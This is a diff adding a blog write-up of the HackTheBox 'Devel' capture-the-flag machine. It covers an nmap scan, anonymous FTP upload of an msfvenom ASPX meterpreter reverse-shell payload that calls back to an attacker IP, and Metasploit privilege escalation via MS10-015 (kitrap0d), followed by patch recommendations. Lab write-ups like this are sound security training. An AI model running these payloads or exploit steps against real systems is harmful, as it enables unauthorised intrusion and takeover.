add: writeup-ctf

content/writeup-ctf/writeup-devel-htb/index.md

@@ -0,0 +1,101 @@
+---
+title: "Writeup - Devel (HTB)"
+date: 2022-04-06
+slug: "writeup-devel-htb"
+type: "writeup-ctf"
+--- 
+
+This is a writeup for the [Devel](https://app.hackthebox.com/machines/Devel) machine from the HackTheBox site.
+
+## Enumeration
+
+First, let's start with a scan of our target with the following command:
+
+
+```bash
+nmap -sV -T4 -Pn 10.10.10.5
+```
+Two TCP ports are discovered:
+
+![](img/image-1.webp)
+
+- 21/tcp : FTP (ftpd)
+- 80/tcp : HTTP web server (Apache 2.4.41)
+
+![](img/image-2.webp)
+
+## Exploit
+
+I start by seeing if it is possible to connect to FTP as `anonymous`:
+
+![](img/image-3.webp)
+
+In addition to being able to read, we have the ability to write, so I create a payload to make a reverse shell with the following command:
+
+
+```bash
+msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.14.9 LPORT=1234 -f aspx -o shell.aspx
+```
+I upload it then with the help of Metasploit I launch a TCP handler to create a meterpreter.
+
+![](img/image-4.webp)
+
+I then access my previously uploaded payload at the following address:
+
+
+```bash
+http://10.10.10.5/shell.aspx
+```
+I now have a reverse shell on the machine.
+
+## Privilege escalation
+
+I pause the meterpreter with CRTL+Z. Then to try to determine some feats, I use the following module on Metasploit.
+
+
+```bash
+use post/multi/recon/local_exploit_suggester
+set SESSION 19
+exploit
+```
+The module has found a number of potential exploits.
+
+![](img/image-5.webp)
+
+I start by testing the first one:
+
+
+```bash
+use windows/local/bypassuac_eventtvwr
+set SESSION 19
+exploit
+```
+![](img/image-6.webp)
+
+But without success. I test the second one:
+
+
+```bash
+use windows/local/ms10_015_kitrap0d
+set SESSION 19
+exploit
+```
+![](img/image-7.webp)
+
+This one worked, I now have a reverse shell with the `NT AUTHORITY\SYSTEM` authorization. 
+
+The module `MS10_015` is linked to CVE-2010-0232.
+
+
+> [...] when access to 16-bit applications is enabled on a 32-bit x86 platform, does not properly validate certain BIOS calls, which allows local users to gain privileges [...] [VK9 Security](https://vk9-sec.com/kitrap0d-windows-kernel-could-allow-elevation-of-privilege-ms10-015-cve-2010-0232/)
+
+I can now get both flags back.
+
+![](img/image-8.webp)
+
+## Recommendations
+
+To patch this host I think it would be necessary to perform a number of actions:
+
+- Disable writing to the FTP server as `anonymous`
+- Update Windows to patch CVE-2010-0232